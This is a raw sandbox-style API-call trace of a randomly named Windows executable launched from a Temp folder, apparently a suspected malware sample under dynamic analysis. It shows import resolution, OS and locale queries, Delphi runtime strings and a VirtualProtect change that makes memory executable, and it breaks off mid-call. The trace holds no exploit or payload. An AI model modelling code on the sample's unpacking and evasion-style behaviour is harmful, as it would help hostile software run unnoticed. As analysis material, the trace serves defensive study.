GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0097.998] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0097.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0097.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0097.999] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0097.999] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0098.000] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0098.000] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0098.000] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0098.000] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0098.000] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0098.000] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0098.000] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0098.000] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0098.001] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0098.001] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0098.001] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0098.001] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0098.001] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0098.001] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0098.001] SetThreadLocale (Locale=0x400) returned 1 [0098.002] GetVersion () returned 0x1db10106 [0098.002] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.002] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0098.002] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.002] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0098.002] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.002] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0098.002] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0098.002] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.002] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0098.002] GetACP () returned 0x4e4 [0098.002] GetCurrentThreadId () returned 0xbc0 [0098.002] GetVersion () returned 0x1db10106 [0098.002] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x711ca8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0098.003] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.003] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.003] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1410000 [0098.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] GetUserDefaultUILanguage () returned 0x409 [0098.004] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0098.004] GetThreadUILanguage () returned 0x120409 [0098.004] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0098.004] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x153a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x153a680, pcchLanguagesBuffer=0x12d768) returned 1 [0098.004] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0098.005] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0098.005] GetUserDefaultUILanguage () returned 0x409 [0098.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0098.005] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0098.005] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0098.005] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0098.005] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0098.006] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0098.006] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0098.006] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x724428 [0098.006] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0098.006] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0098.007] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0098.007] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.007] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.007] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x15080dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0098.007] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0098.007] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] GetThreadLocale () returned 0x409 [0098.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0098.007] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0098.007] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.008] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0098.008] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0098.008] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x724438 [0098.008] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0098.008] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0098.008] GetLastError () returned 0x7a [0098.008] GetLogicalProcessorInformation (in: Buffer=0x14f99d0, ReturnedLength=0x12fab0 | out: Buffer=0x14f99d0, ReturnedLength=0x12fab0) returned 1 [0098.008] GetCurrentThreadId () returned 0xbc0 [0098.008] GetCurrentThreadId () returned 0xbc0 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0098.008] GetThreadLocale () returned 0x409 [0098.008] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0098.008] GetThreadLocale () returned 0x409 [0098.008] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0098.008] GetCurrentThreadId () returned 0xbc0 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: 